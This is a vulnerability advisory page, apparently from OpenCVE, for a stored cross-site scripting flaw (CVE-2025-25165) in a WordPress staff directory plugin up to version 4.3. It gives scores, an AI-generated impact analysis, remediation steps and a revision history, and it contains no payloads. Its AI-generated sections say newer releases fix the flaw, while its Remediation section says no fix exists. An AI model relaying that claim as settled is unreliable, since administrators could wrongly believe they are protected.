Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in richardgabriel Staff Directory Plugin: Company Directory staff-directory-pro allows Stored XSS.This issue affects Staff Directory Plugin: Company Directory: from n/a through <= 4.3.
Published: 2025-03-03
Score: 7.1 High
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The plugin contains a stored XSS flaw that allows user input to be stored and later rendered without proper escaping. An attacker who can insert malicious code into the plugin’s fields can cause browsers that view the compromised content to execute the attacker’s script. This could enable data theft, session hijacking, or defacement of the site.

Affected Systems

The vulnerability affects the "Staff Directory Plugin: Company Directory" by the vendor richardgabriel. All versions from the earliest release up to and including version 4.3 are vulnerable; applying any version newer than 4.3 removes the flaw.

Risk and Exploitability

The CVSS score of 7.1 indicates moderate to high severity. The EPSS score of less than 1 % suggests a low current exploitation probability, and the flaw is not listed in the CISA KEV catalog. Attackers could exploit the flaw by injecting malicious payloads when adding or editing directory entries, which are then displayed to all site visitors or administrators. The impact hinges on the privilege level of the actor who inserts the payload; if they can edit content, they can affect all users who view the page.

Generated by OpenCVE AI on May 1, 2026 at 14:22 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade Staff Directory Plugin: Company Directory to any release newer than version 4.3 to eliminate the stored XSS vulnerability.
  • If an upgrade is not immediately possible, disable the plugin or remove the functionality that allows the vulnerable input fields from being used by untrusted users.
  • Apply an additional layer of input filtering or output encoding in the plugin’s code to ensure that any remaining user‑supplied content is properly escaped before display, reducing the risk of XSS until a formal patch is applied.

Generated by OpenCVE AI on May 1, 2026 at 14:22 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
EUVD EUVD EUVD-2025-5636 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NotFound Staff Directory Plugin: Company Directory allows Stored XSS. This issue affects Staff Directory Plugin: Company Directory: from n/a through 4.3.
History

Thu, 23 Apr 2026 15:00:00 +0000

Type Values Removed Values Added
Metrics cvssV3_1

{'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L'}

Wed, 01 Apr 2026 23:45:00 +0000

Type Values Removed Values Added
Description Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NotFound Staff Directory Plugin: Company Directory allows Stored XSS. This issue affects Staff Directory Plugin: Company Directory: from n/a through 4.3. Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in richardgabriel Staff Directory Plugin: Company Directory staff-directory-pro allows Stored XSS.This issue affects Staff Directory Plugin: Company Directory: from n/a through <= 4.3.
References
Metrics cvssV3_1

{'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L'}

Tue, 04 Mar 2025 03:45:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Mon, 03 Mar 2025 13:45:00 +0000

Type Values Removed Values Added
Description Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NotFound Staff Directory Plugin: Company Directory allows Stored XSS. This issue affects Staff Directory Plugin: Company Directory: from n/a through 4.3.
Title WordPress Staff Directory Plugin: Company Directory Plugin <= 4.3 - Cross Site Scripting (XSS) vulnerability
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L'}

Subscriptions

No data.

cve-icon MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-04-28T16:11:37.553Z

Reserved: 2025-02-03T13:35:31.279Z

Link: CVE-2025-25165

cve-icon Vulnrichment

Updated: 2025-03-03T15:59:24.351Z

cve-icon NVD

Status : Deferred

Published: 2025-03-03T14:15:54.330

Modified: 2026-04-23T15:25:44.050

Link: CVE-2025-25165

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-05-01T14:30:06Z

Weaknesses